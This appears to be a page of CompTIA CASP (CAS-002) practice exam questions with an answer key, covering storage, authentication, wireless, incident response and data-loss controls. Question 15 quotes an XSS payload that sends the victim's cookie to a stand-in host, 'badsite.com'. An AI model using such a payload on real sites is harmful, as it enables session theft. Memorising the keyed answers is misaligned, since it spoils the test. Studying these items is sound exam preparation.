CompTIA CAS-002

CompTIA Advanced Security Practitioner (CASP)

(Page 1 out of 36)
Showing 15 of 532 Questions
Exam Version: 6.0
Question No : 1 - Topic 1

Company ABC's SAN is nearing capacity, and will cause costly downtimes if servers run
out of disk space. Which of the following is a more cost effective alternative to buying a new
SAN?

  • A. Enable multipath to increase availability
  • B. Enable deduplication on the storage pools
  • C. Implement snapshots to reduce virtual disk size
  • D. Implement replication to offsite datacenter

Answer : B



Question No : 2 - Topic 1

A systems administrator establishes a CIFS share on a UNIX device to share data to
Windows systems. The security authentication on the Windows domain is set to the highest
level. Windows users are stating that they cannot authenticate to the UNIX share. Which of
the following settings on the UNIX server would correct this problem?

  • A. Refuse LM and only accept NTLMv2
  • B. Accept only LM
  • C. Refuse NTLMv2 and accept LM
  • D. Accept only NTLM

Answer : A



Question No : 3 - Topic 1

Two universities are making their 802.11n wireless networks available to the other
university's students. The infrastructure will pass the students' credentials back to the
home school for authentication via the Internet.
The requirements are:
✑ Mutual authentication of clients and authentication server
✑ The design should not limit connection speeds
✑ Authentication must be delegated to the home school
✑ No passwords should be sent unencrypted
The following design was implemented:
✑ WPA2 Enterprise using EAP-PEAP-MSCHAPv2 will be used for wireless security
✑ RADIUS proxy servers will be used to forward authentication requests to the home school
✑ The RADIUS servers will have certificates from a common public certificate authority
✑ A strong shared secret will be used for RADIUS server authentication
Which of the following security considerations should be added to the design?

  • A. The transport layer between the RADIUS servers should be secured
  • B. WPA Enterprise should be used to decrease the network overhead
  • C. The RADIUS servers should have local accounts for the visiting students
  • D. Students should be given certificates to use for authentication to the network

Answer : A



Question No : 4 - Topic 1

A large organization has recently suffered a massive credit card breach. During the months
of Incident Response, there were multiple attempts to assign blame for whose fault it was
that the incident occurred. In which part of the incident response phase would this be
addressed in a controlled and productive manner?

  • A. During the Identification Phase
  • B. During the Lessons Learned phase
  • C. During the Containment Phase
  • D. During the Preparation Phase

Answer : B



Question No : 5 - Topic 1

Three companies want to allow their employees to seamlessly connect to each other's
wireless corporate networks while keeping one consistent wireless client configuration.
Each company wants to maintain its own authentication infrastructure and wants to ensure
that an employee who is visiting the other two companies is authenticated by the home
office when connecting to the other companies' wireless network. All three companies have
agreed to standardize on 802.1x EAP-PEAP-MSCHAPv2 for client configuration. Which of
the following should the three companies implement?

  • A. The three companies should agree on a single SSID and configure a hierarchical RADIUS system which implements trust delegation.
  • B. The three companies should implement federated authentication through Shibboleth connected to an LDAP backend and agree on a single SSID.
  • C. The three companies should implement a central portal-based single sign-on and agree to use the same CA when issuing client certificates.
  • D. All three companies should use the same wireless vendor to facilitate the use of a shared cloud based wireless controller.

Answer : A



Question No : 6 - Topic 1

A university requires a significant increase in web and database server resources for one
week, twice a year, to handle student registration. The web servers remain idle for the rest
of the year. Which of the following is the MOST cost effective way for the university to
securely handle student registration?

  • A. Virtualize the web servers locally to add capacity during registration.
  • B. Move the database servers to an elastic private cloud while keeping the web servers local.
  • C. Move the database servers and web servers to an elastic private cloud.
  • D. Move the web servers to an elastic public cloud while keeping the database servers local.

Answer : D



Question No : 7 - Topic 1

A security administrator wants to prevent sensitive data residing on corporate laptops and
desktops from leaking outside of the corporate network. The company has already
implemented full-disk encryption and has disabled all peripheral devices on its desktops
and laptops. Which of the following additional controls MUST be implemented to minimize
the risk of data leakage? (Select TWO).

  • A. A full-system backup should be implemented to a third-party provider with strong encryption for data in transit.
  • B. A DLP gateway should be installed at the company border.
  • C. Strong authentication should be implemented via external biometric devices.
  • D. Full-tunnel VPN should be required for all network communication.
  • E. Full-drive file hashing should be implemented with hashes stored on separate storage.
  • F. Split-tunnel VPN should be enforced when transferring sensitive data.

Answer : B,D



Question No : 8 - Topic 1

The risk manager has requested a security solution that is centrally managed, can easily
be updated, and protects end users' workstations from both known and unknown malicious
attacks when connected to either the office or home network. Which of the following would
BEST meet this requirement?

  • A. HIPS
  • B. UTM
  • C. Antivirus
  • D. NIPS
  • E. DLP

Answer : A



Question No : 9 - Topic 1

The source workstation image for new accounting PCs has begun blue-screening. A
technician notices that the date/time stamp of the image source appears to have changed.
The desktop support director has asked the Information Security department to determine if
any changes were made to the source image. Which of the following methods would BEST
help with this process? (Select TWO).

  • A. Retrieve source system image from backup and run file comparison analysis on the two images.
  • B. Parse all images to determine if extra data is hidden using steganography.
  • C. Calculate a new hash and compare it with the previously captured image hash.
  • D. Ask desktop support if any changes to the images were made.
  • E. Check key system files to see if date/time stamp is in the past six months.

Answer : A,C



Question No : 10 - Topic 1

A security administrator notices a recent increase in workstations becoming compromised
by malware. Often, the malware is delivered via drive-by downloads, from malware hosting
websites, and is not being detected by the corporate antivirus. Which of the following
solutions would provide the BEST protection for the company?

  • A. Increase the frequency of antivirus downloads and install updates to all workstations.
  • B. Deploy a cloud-based content filter and enable the appropriate category to prevent further infections.
  • C. Deploy a WAF to inspect and block all web traffic which may contain malware and exploits.
  • D. Deploy a web based gateway antivirus server to intercept viruses before they enter the network.

Answer : B



Question No : 11 - Topic 1

A security consultant is conducting a network assessment and wishes to discover any
legacy backup Internet connections the network may have. Where would the consultant
find this information and why would it be valuable?

  • A. This information can be found in global routing tables, and is valuable because backup connections typically do not have perimeter protection as strong as the primary connection.
  • B. This information can be found by calling the regional Internet registry, and is valuable because backup connections typically do not require VPN access to the network.
  • C. This information can be found by accessing telecom billing records, and is valuable because backup connections typically have much lower latency than primary connections.
  • D. This information can be found by querying the network's DNS servers, and is valuable because backup DNS servers typically allow recursive queries from Internet hosts.

Answer : A



Question No : 12 - Topic 1

The helpdesk department desires to roll out a remote support application for internal use on
all company computers. This tool should allow remote desktop sharing, system log
gathering, chat, hardware logging, inventory management, and remote registry access. The
risk management team has been asked to review vendor responses to the RFQ. Which of
the following questions is the MOST important?

  • A. What are the protections against MITM?
  • B. What accountability is built into the remote support application?
  • C. What encryption standards are used in the tracking database?
  • D. What snapshot or “undo” features are present in the application?
  • E. What encryption standards are used in remote desktop and file transfer functionality?

Answer : B



Question No : 13 - Topic 1

The helpdesk manager wants to find a solution that will enable the helpdesk staff to better
serve company employees who call with computer-related problems. The helpdesk staff is
currently unable to perform effective troubleshooting and relies on callers to describe their
technology problems. Given that the helpdesk staff is located within the company
headquarters and 90% of the callers are telecommuters, which of the following tools should
the helpdesk manager use to make the staff more effective at troubleshooting while at the
same time reducing company costs? (Select TWO).

  • A. Web cameras
  • B. Email
  • C. Instant messaging
  • D. BYOD
  • E. Desktop sharing
  • F. Presence

Answer : C,E



Question No : 14 - Topic 1

A new internal network segmentation solution will be implemented into the enterprise that
consists of 200 internal firewalls. As part of running a pilot exercise, it was determined that
it takes three changes to deploy a new application onto the network before it is operational.
Security now has a significant effect on overall availability. Which of the following would be
the FIRST process to perform as a result of these findings?

  • A. Lower the SLA to a more tolerable level and perform a risk assessment to see if the solution could be met by another solution. Reuse the firewall infrastructure on other projects.
  • B. Perform a cost benefit analysis and implement the solution as it stands as long as the risks are understood by the business owners around the availability issues. Decrease the current SLA expectations to match the new solution.
  • C. Engage internal auditors to perform a review of the project to determine why and how the project did not meet the security requirements. As part of the review ask them to review the control effectiveness.
  • D. Review to determine if control effectiveness is in line with the complexity of the solution. Determine if the requirements can be met with a simpler solution.

Answer : D



Question No : 15 - Topic 1

A security administrator notices the following line in a server's security log:
<input name='credentials' type='TEXT' value='" + request.getParameter('><script>document.location='http://badsite.com/?q='document.cookie</script>') + "';
The administrator is concerned that it will take the developer a lot of time to fix the
application that is running on the server. Which of the following should the security
administrator implement to prevent this particular attack?

  • A. WAF
  • B. Input validation
  • C. SIEM
  • D. Sandboxing
  • E. DAM

Answer : A


